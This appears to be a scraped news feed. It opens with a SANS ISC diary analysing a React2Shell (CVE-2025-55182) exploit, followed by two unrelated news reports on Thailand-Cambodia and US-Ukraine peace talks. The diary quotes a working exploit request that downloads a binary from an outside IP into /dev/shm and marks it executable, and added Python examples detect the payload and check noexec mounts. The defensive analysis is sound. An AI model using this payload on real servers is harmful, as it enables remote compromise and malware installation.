
  • More React2Shell Exploits CVE-2025-55182 – SANS ISC



    Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload:

    ------WebKitFormBoundaryxtherespoopalloverme

    Content-Disposition: form-data; name="0"


    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

    ------WebKitFormBoundaryxtherespoopalloverme

    Content-Disposition: form-data; name="1"


    "$@0"

    ------WebKitFormBoundaryxtherespoopalloverme

    ------WebKitFormBoundaryxtherespoopalloverme--

    To make the key components more readable:

    process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',
    r=>r.pipe(process.mainModule.require('fs').
    createWriteStream('/dev/shm/lrt').on('finish'

    This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

    process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

    And then the script is marked as executable. It is unclear whether the script is explicitly executed. The VirusTotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for React2Shell.

    Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.
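One way to match the markers of this payload in captured request bodies, added here as an example and not part of the original diary: it splits the multipart body, decodes each part as JSON, flags strings that reference `__proto__` or `constructor`, and pulls download URLs and drop paths out of embedded Node.js code. The sample body is constructed (modelled on the request above, with a documentation address as the host), and `scan_multipart`, `strings` and the finding labels are names made up for this example.

```python
import json
import re
# Constructed sample modelled on the request quoted above; the download host
# is replaced with a documentation address (192.0.2.10).
BOUNDARY = "----WebKitFormBoundaryEXAMPLE"
PART0 = json.dumps({
    "then": "$1:__proto__:then",
    "_response": {
        "_prefix": "process.mainModule.require('http').get('http://192.0.2.10/x',r=>"
                   "r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt')));",
        "_formData": {"get": "$1:constructor:constructor"},
    },
})
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="0"', "", PART0,
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="1"', "", '"$@0"',
    "--" + BOUNDARY + "--", ""])

NODE_CODE = re.compile(r"process\.mainModule\.require|createWriteStream|chmodSync")
INDICATOR = re.compile(r"https?://[^\s'\")]+|/(?:dev/shm|tmp|dev)/[\w.-]+")

def strings(node, path):  # yields (json_path, value) for every string in the tree
    if isinstance(node, dict):
        for key, child in node.items():
            yield from strings(child, f"{path}.{key}")
    elif isinstance(node, list):
        for i, child in enumerate(node):
            yield from strings(child, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node

def scan_multipart(body, boundary):
    """Flag form parts whose JSON references __proto__/constructor or embeds Node code."""
    findings = []
    for part in body.split("--" + boundary):
        head, sep, data = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', head)
        if not (sep and name):
            continue  # preamble, closing delimiter, or a part without a name
        try:
            tree = json.loads(data)
        except ValueError:
            continue  # not JSON, nothing to inspect in this example
        for path, val in strings(tree, "part" + name.group(1)):
            if val.startswith("$") and {"__proto__", "constructor"} & set(val.split(":")[1:]):
                findings.append(("proto-ref", path, val))
            if NODE_CODE.search(val):
                findings.append(("node-code", path, INDICATOR.findall(val)))
    return findings
```

The `INDICATOR` pattern covers the three drop locations named in this diary (/dev/shm, /tmp and /dev).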

    /dev/shm and /tmp are typically world-writable and should always work. /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create /tmp as its own partition and mark it as “noexec” to prevent it from being used as a scratch space to run exploit code. But this is sometimes tough to implement with “normal” processes running code in /tmp (not pretty, but done every so often).
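A check for the hardening described above, as an added example that is not from the original diary: it reads a mount table in `/proc/mounts` format and reports, for each drop location named here, which mount governs it and whether that mount carries `noexec`. The mount table is a constructed sample, and `audit_scratch` and its helpers are hypothetical names; note that in the sample /tmp is hardened while /dev/shm, the path used by the payload above, is not.

```python
# Constructed /proc/mounts-style sample: device mountpoint fstype options dump pass
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
devtmpfs /dev devtmpfs rw,nosuid,size=4096k,mode=755 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda3 /tmp ext4 rw,nosuid,nodev,noexec,relatime 0 0
"""

SCRATCH_DIRS = ("/tmp", "/dev/shm", "/dev")  # drop locations named in the diary

def parse_mounts(text):
    """Return {mountpoint: set(options)}; a later entry overrides an earlier one."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            # /proc/mounts escapes spaces in paths as \040
            mountpoint = fields[1].replace("\\040", " ")
            table[mountpoint] = set(fields[3].split(","))
    return table

def governing_mount(path, table):
    """Longest mountpoint that is the path itself or one of its parents."""
    best = "/"
    for mp in table:
        covers = path == mp or path.startswith(mp.rstrip("/") + "/")
        if covers and len(mp) > len(best):
            best = mp
    return best

def audit_scratch(text, dirs=SCRATCH_DIRS):
    """Map each scratch directory to its governing mount and noexec status."""
    table = parse_mounts(text)
    report = {}
    for d in dirs:
        mp = governing_mount(d, table)
        report[d] = {
            "mount": mp,
            "dedicated": mp == d,  # False: the directory shares its parent's options
            "noexec": "noexec" in table.get(mp, set()),
        }
    return report
```

On a live host, pass the contents of `/proc/mounts` as `text`.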

    [1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection



    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


  • South East Asian bloc meet to seek end to Thailand-Cambodia conflict



    South East Asia’s top diplomats met on Monday in Malaysia in a bid to end deadly border clashes between Thailand and Cambodia that have killed at least 41 people and displaced close to one million others.

    They were seeking to revive a ceasefire that was brokered in July by Malaysia as chair of the Association of Southeast Asian Nations (Asean) and US President Donald Trump.

    This was the first meeting between officials of Thailand and Cambodia since fighting resumed on 8 December. Both countries have blamed each other for the fresh hostilities.

    The conflict dates back more than a century, when the borders of the two nations were drawn after the French occupation of Cambodia.

    In his opening remarks, Malaysia’s foreign minister asked both sides and other Asean members to give the matter “our most urgent attention”.

    “We must consider the wider ramifications of the continued escalation of the situation for the people we serve,” Mohamad Hasan told his counterparts, according to news agency AFP.

    The most recent fighting has seen the exchange of artillery fire along the 800km (500-mile) border. Thailand has also launched air strikes targeting Cambodian positions.

    The conflict has been the worst between Asean member states since the association was founded in 1967. The failure to contain it represents a serious blow to the bloc’s credibility.

    Malaysian Prime Minister Anwar Ibrahim, who presided over the signing of the July ceasefire alongside Trump, said he was “cautiously optimistic” about Monday’s meeting in Kuala Lumpur.

    “Our duty is to present the facts, but more importantly, to press upon them that it is imperative for them to secure peace,” he said last week.

    Cambodia has said that the talks aim to restore “peace, stability and good neighbourly relations”, adding that it would reaffirm its position that the disputes should be resolved through peaceful means.

    Thailand, while calling the meeting an important opportunity, reiterated its conditions for negotiations, including a declaration of ceasefire from Cambodia first and a “genuine and sustained” ceasefire.

    The US and China have also been attempting to mediate a new ceasefire.

    US Secretary of State Marco Rubio, who had a phone call with his Thai counterpart on Thursday, said that he hoped a new ceasefire could be reached by Monday or Tuesday.

    China’s special envoy for Asian affairs, Deng Xijun, visited Phnom Penh last week. A statement from Beijing said he reaffirmed that China would continue to play a constructive role in facilitating dialogue between Cambodia and Thailand.

    Additional reporting by BBC’s South East Asia Correspondent Jonathan Head




  • US and Ukraine call Miami talks productive despite no breakthrough



    US and Ukrainian envoys say “productive and constructive” talks have taken place in Miami, but there still appears to be no major breakthrough in efforts to end Ukraine’s war with Russia.

    Donald Trump’s special envoy, Steve Witkoff, issued a joint statement with the top Ukrainian negotiator, Rustem Umerov, after three days of meetings with European allies.

    The pair said the meeting focused on aligning positions on a 20-point plan, a “multilateral security guarantee framework”, a “US Security guarantee framework for Ukraine” and an “economic & prosperity plan”.

    Separate talks have been taking place in Miami between the US and the Russian envoy, Kirill Dmitriev.

    “Our shared priority is to stop the killing, ensure guaranteed security, and create conditions for Ukraine’s recovery, stability, and long-term prosperity,” Witkoff and Umerov said in a statement.

    The meetings are the latest step in weeks of diplomatic activity, sparked by the leaking of a 28-point US peace plan which shocked Ukraine and its European allies for appearing to favour Russia, which launched a full-scale invasion of Ukraine nearly four years ago.

    Witkoff said representatives from Russia had met himself and other US officials in southern Florida, including Trump’s son-in-law Jared Kushner.

    Witkoff said the meetings with Russian envoy Dmitriev were also “productive and constructive” and that “Russia remains fully committed to achieving peace in Ukraine”.

    Trump has been pushing Ukraine and Russia to come to an agreement on ending the war, but so far the two countries have been unable to agree on major issues, including Moscow’s demand to keep land it has already seized.

    US intelligence reports continue to warn that Russian President Vladimir Putin still wants to capture all of Ukraine and reclaim parts of Europe that belonged to the former Soviet empire, six sources familiar with US intelligence told the Reuters news agency.

    This comes after Putin told the BBC’s Steve Rosenberg that there will be no more wars after Ukraine, if Russia is treated with respect.

    “There won’t be any operations if you treat us with respect, if you respect our interests just as we’ve always tried to respect yours,” he said.

    Meanwhile, a Ukrainian drone attack damaged two vessels and two piers in Russia’s southern Krasnodar region, Russian officials said on Monday.

    The damage led to a big fire, but Russian authorities say all crew were safely evacuated. Some reports say oil infrastructure was targeted.


